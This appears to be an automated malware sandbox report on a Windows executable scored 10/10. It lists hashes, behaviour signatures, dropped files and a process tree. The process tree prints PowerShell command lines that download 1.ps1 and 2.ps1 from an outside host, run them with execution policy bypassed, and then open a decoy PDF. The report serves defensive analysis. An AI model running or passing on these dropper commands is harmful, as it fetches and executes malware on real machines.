Overview

overview

10

Static

static

3

34c2047d0b...0N.exe

windows7-x64

10

34c2047d0b...0N.exe

windows10-2004-x64

10

34c2047d0b...0N.exe

android-13-x64

34c2047d0b...0N.exe

android-13-x64

34c2047d0b...0N.exe

macos-10.15-amd64

34c2047d0b...0N.exe

ubuntu-18.04-amd64

34c2047d0b...0N.exe

debian-9-armhf

34c2047d0b...0N.exe

debian-9-mips

34c2047d0b...0N.exe

debian-9-mipsel

Resubmissions

21-01-2025 12:01

250121-n61zrssrbr 10

21-01-2025 11:10

250121-m9zqfazqh1 10

16-07-2024 00:12

240716-ahlnaayeqf 10

Analysis

  • max time kernel
    118s
  • max time network
    121s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    21-01-2025 12:01

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    34c2047d0b69ba023b700c21431accc0N.exe

  • Size

    258KB

  • MD5

    34c2047d0b69ba023b700c21431accc0

  • SHA1

    e34c28611707c81565cb73d8a1a46dfc3ab2495a

  • SHA256

    ff9b39d07fd6e4a7f98d109664d91de9e318671da6412da85396541722d92799

  • SHA512

    a1566d65beb8135edfcb5c4a09631bc17dff56db672621990a10d0eff37a0290c7e1e9705f1918a7e719cbea4b1cecc29bb8254da946108e9bd5432070cc8ca7

  • SSDEEP

    6144:VbJhs7QW69hd1MMdxPe9N9uA0hu9TBrjJ0Xxne0AqGLj:VbjDhu9TV6xeJqG3

Score
10/10
discoveryexecutionlinkpdf

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://thelustfactory.com/vns/1.ps1

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://thelustfactory.com/vns/2.ps1

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Using powershell.exe command.

    execution
  • HTTP links in PDF interactive object 1 IoCs

    Detects HTTP links in interactive objects within PDF files.

    pdflink
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Delays execution with timeout.exe 1 IoCs
    defense_evasion
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 22 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\34c2047d0b69ba023b700c21431accc0N.exe
    C:\Users\Admin\AppData\Local\Temp\34c2047d0b69ba023b700c21431accc0N.exe sh $MOZILLA\nPLUGIN %SIGILL% "SIGTERM|DESTROY|SIGKILL"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2512
    • C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\A7A5.tmp\A7B5.tmp\A7B6.bat C:\Users\Admin\AppData\Local\Temp\34c2047d0b69ba023b700c21431accc0N.exe sh $MOZILLA\nPLUGIN %SIGILL% "SIGTERM|DESTROY|SIGKILL""
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1628
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -Command "(New-Object Net.WebClient).DownloadFile('http://thelustfactory.com/vns/1.ps1', 'C:\Users\Admin\AppData\Roaming\1.ps1')"
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2068
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -Command "(New-Object Net.WebClient).DownloadFile('http://thelustfactory.com/vns/2.ps1', 'C:\Users\Admin\AppData\Roaming\2.ps1')"
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3056
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -ExecutionPolicy Bypass -File C:\Users\Admin\AppData\Roaming\1.ps1
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2812
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -ExecutionPolicy Bypass -File C:\Users\Admin\AppData\Roaming\2.ps1
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2656
      • C:\Windows\system32\timeout.exe
        timeout /t 5
        3⤵
        • Delays execution with timeout.exe
        PID:1708
      • C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe
        "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Roaming\pdf.pdf"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: CmdExeWriteProcessMemorySpam
        • Suspicious behavior: GetForegroundWindowSpam
        • Suspicious use of SetWindowsHookEx
        PID:1096

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\A7A5.tmp\A7B5.tmp\A7B6.bat
    Filesize

    712B

    MD5

    0e9ce5162ba7661c863a835f9d34d907

    SHA1

    0b351312ab57a02857753cab2287da680955f40d

    SHA256

    b67f37e765a5be87d9591efdb0501f0c97aa342ad1e4c34a711828c4a505c81e

    SHA512

    8d7c0a3cc95628cbec8a215f365c3ed86746e7b350c811ace5ea4419031adbdbe75dc7d1350d9c71db51f5cbb972db4e33b1d05e9a3e2a109c559eb065811ec0

    Download Submit

  • C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\9.0\SharedDataEvents
    Filesize

    3KB

    MD5

    404703d1c60bb9f894353c347d34a857

    SHA1

    1c10b5a1500f1dab89365112607633c9926a009b

    SHA256

    31b3d5defe0e159044b8cef2517793a66eed20668d606077f5a9cf8c9ad021da

    SHA512

    981db7bc49d80f3de192b3e5f9861a30132997b47ffa4eb421f19ac3b960b26d78ebc550ad16e593ab38a7720d9155660269cd4b6d81c713f1cd44f838be7d78

    Download Submit

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
    Filesize

    7KB

    MD5

    feb86cbc10a296aa53679e8215cca199

    SHA1

    822f5ee47ff26f6caf2fad86976389b616b953e0

    SHA256

    52a8d5182771be882438d9706e4297b0bd19f2e5850f8319e1661ea6d92a51f5

    SHA512

    d5f4b794644ee415631c00d3f28a733aaa79b733b153fa91c5f1d103bf39fece57a478f65230b818786cf6373683605fdd1bd79d121a699074dfca168eebc201

    Download Submit

  • C:\Users\Admin\AppData\Roaming\pdf.pdf
    Filesize

    139KB

    MD5

    5afaf79789a776d81ec91ccbdc9fdaba

    SHA1

    6703901978dcb3dbf2d9915e1d3e066cfe712b0a

    SHA256

    38c9792d725c45dd431699e6a3b0f0f8e17c63c9ac7331387ee30dcc6e42a511

    SHA512

    09253eb87d097bdaa39f98cbbea3e6d83ee4641bca76c32c7eb1add17e9cb3117adb412d2e04ab251cca1fb19afa8b631d1e774b5dc8ae727f753fe2ffb5f288

    Download Submit

  • memory/2068-13-0x000007FEF53E0000-0x000007FEF5D7D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2068-12-0x000007FEF53E0000-0x000007FEF5D7D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2068-11-0x000007FEF53E0000-0x000007FEF5D7D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2068-14-0x000007FEF53E0000-0x000007FEF5D7D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2068-15-0x000007FEF53E0000-0x000007FEF5D7D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2068-16-0x000007FEF53E0000-0x000007FEF5D7D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2068-10-0x0000000002920000-0x0000000002928000-memory.dmp

    Filesize

    32KB

    Download

  • memory/2068-9-0x000000001B570000-0x000000001B852000-memory.dmp

    Filesize

    2.9MB

    Download

  • memory/2068-8-0x000007FEF569E000-0x000007FEF569F000-memory.dmp

    Filesize

    4KB

    Download

  • memory/3056-22-0x000000001B6C0000-0x000000001B9A2000-memory.dmp

    Filesize

    2.9MB

    Download

  • memory/3056-23-0x0000000002290000-0x0000000002298000-memory.dmp

    Filesize

    32KB

    Download